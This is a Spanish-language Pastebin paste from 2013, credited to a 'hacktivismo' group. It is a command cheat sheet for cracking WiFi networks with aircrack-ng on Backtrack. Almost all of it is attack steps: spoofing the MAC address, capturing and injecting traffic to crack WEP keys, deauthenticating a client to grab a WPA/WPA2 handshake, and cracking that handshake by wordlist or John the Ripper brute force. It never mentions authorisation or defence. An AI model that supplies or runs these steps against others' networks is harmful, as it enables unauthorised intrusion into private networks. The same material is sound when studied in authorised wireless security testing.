Mayk0

#; Crackear WEP´s - WPA/WPA2/PSK [Resumen de Codigos]

May 12th, 2013
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.09 KB | None | 0 0
  1. Crackear WEP´s - WPA/WPA2/PSK [Mayk0 - Hacktivismo Latinoamerica]
  2.  
  3. #; Resumen de Codigos Para Crackear Redes de Wifi!~ Backtrack
  4.  
  5. 1. WEP`s:
  6.  
  7. NOTA: En todos los casos reemplazar:
  8. XXXX: Interface
  9. ZZZZ: Canal
  10. YYYY: MAC BSSID
  11. RRR: ESSID
  12.  
  13.  
  14. 1.1. Cambiar la MAC:
  15.  
  16. A. airmon-ng (Ver la interface que usamos)
  17. B. airmon-ng stop XXXX (Detenemos el modo monitor)
  18. C. ifconfig XXXX down (Tiramos nuestra interface)
  19. D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
  20. E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)
  21.  
  22.  
  23.  
  24. 1.2. Buscar Redes:
  25.  
  26. F. airodump-ng XXXX ( Scannea Redes)
  27. G. CTRL + C (Detiene el scanneo)
  28. H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos #DATAs) [No cerrar consola]
  29.  
  30.  
  31.  
  32. 1.3. Asociandonos a la red (En otra consola):
  33.  
  34. I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)
  35.  
  36.  
  37.  
  38. 1.4 Inyectando Trafico:
  39.  
  40. J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)
  41.  
  42.  
  43.  
  44. 1.5. Desencriptando la Clave (En otra consola):
  45.  
  46. K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)
  47.  
  48.  
  49.  
  50. 2. WPA/WPA2/PSK:
  51.  
  52. NOTA: En todos los casos reemplazar:XXXX: Interface
  53. ZZZZ: Canal
  54. YYYY: MAC BSSID
  55. RRR: Interface modo monitor
  56. TTTT: Station
  57.  
  58.  
  59.  
  60. 2.1. Colocar la interface en modo monitor
  61.  
  62. A. aimon-ng (Saber nuestra Interface)
  63. B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)
  64.  
  65.  
  66.  
  67. 2.2. Capturando el Handshake:
  68.  
  69. C. airodump-ng RRR (Scannea redes)
  70. D. CTRL + C (Frena el scanneo)
  71. E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
  72. F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)
  73.  
  74.  
  75.  
  76. 2.3 Obteniendo la Clave:
  77.  
  78. G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
  79. G.2. /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)
Add Comment
Please, Sign In to add comment